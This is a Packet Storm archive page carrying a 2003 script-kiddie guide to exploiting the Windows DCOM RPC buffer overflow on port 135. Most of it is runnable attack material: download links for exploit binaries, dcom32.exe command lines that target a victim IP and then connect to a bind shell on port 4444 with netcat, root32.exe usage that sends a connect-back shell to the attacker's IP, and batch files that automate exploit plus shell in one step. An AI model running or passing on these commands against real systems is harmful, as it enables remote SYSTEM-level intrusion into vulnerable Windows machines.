what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

illmob.txt

illmob.txt
Posted Jul 28, 2003
Site illmob.org

Paper discussing utilization of the Win32 exploit for the DCOM RPC vulnerability.

tags | paper
systems | windows
SHA-256 | ac991411216d76522190300a8ee9d05dc9d1eee9a92a9af2f72a6cffa66b6bb9

illmob.txt

Change Mirror Download
DCOM RPC exploit paper
7/26/03
by: illwill <xillwillx@yahoo.com>
-------------------------------------------------------------------------------
Paper on how to remotely exploit for win32 NT boxes using a buffer overflow
on port 135 through the Windows RPC Interface resulting in execution of any
commands on vulnerable Windows systems with SYSTEM privileges.
https://illmob.org/rpc/
_______________________________________________________________________________

There are 2 dcom Win32 ported versions available:
Ben Lauziere blauziere@alern.org https://illmob.org/rpc/DComExpl_UnixWin32.zip
"exceed" exceed@microsoftsucks.org https://illmob.org/rpc/dcom-win32.zip

for my example ill be using ben's version cuz it doesnt use a cygwin.dll
how to use the Dcom32.exe ported for win32 boxes:

c:\> dcom32.exe <OS ver. & service pack> <Victim IP>
(ex. C:\> dcom32.exe 2 192.168.0.2)
if all goes well you should get a shell on port 4444 to connect to.
fire up netcat

c:> nc -vvv VicIP Port
(ex. c:\>nc 192.168.0.2 4444
JackedXP [192.168.0.2] 4444 open
Microsoft Windows XP [Version 5.1.2600]
C:\WINDOWS\system32>)

BAM!!! You got a command prompt access to the victim box!!

easy kiddie bat for dcom32 from morning_wood

<snip rpcx.bat>
@echo on
@echo easy kiddi .bat by morning_wood@exploitlabs.com
@echo useage is "target remote-ip"
@echo target is 1-6 where
@echo - 0 Windows 2000 SP0 (english)
@echo - 1 Windows 2000 SP1 (english)
@echo - 2 Windows 2000 SP2 (english)
@echo - 3 Windows 2000 SP3 (english)
@echo - 4 Windows 2000 SP4 (english)
@echo - 5 Windows XP SP0 (english)
@echo - 6 Windows XP SP1 (english)
pause
dcom32 %1 %2
nc -vvv %2 4444
</snip>

commandline for it would be
rpcx.bat <osVer> <IP>
(ex. rpcx 2 192.168.0.2)







how to use the root32 exploit (which i found to work like shit.)
first open a recieving netcat connection on your own computer
using the command line
nc -l -v -p 1199 (1199 can be any port you desire)


then use the command line for root32.exe

root32.exe 172.0.15.29 64.252.136.135 1199 2
remoteIP^ yourIP^ yourPORT^ ^vic service pack

if all goes well you should recieve a commandline connect-back
prompt through netcat to the vulnerable box.

morning_wood's quick n grimy bat file Root.bat
<snip>
root32 %1 %2 %3 2
nc -vv %1 %3
</snip>

peace out.
illwill
https://illmob.org
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    17 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close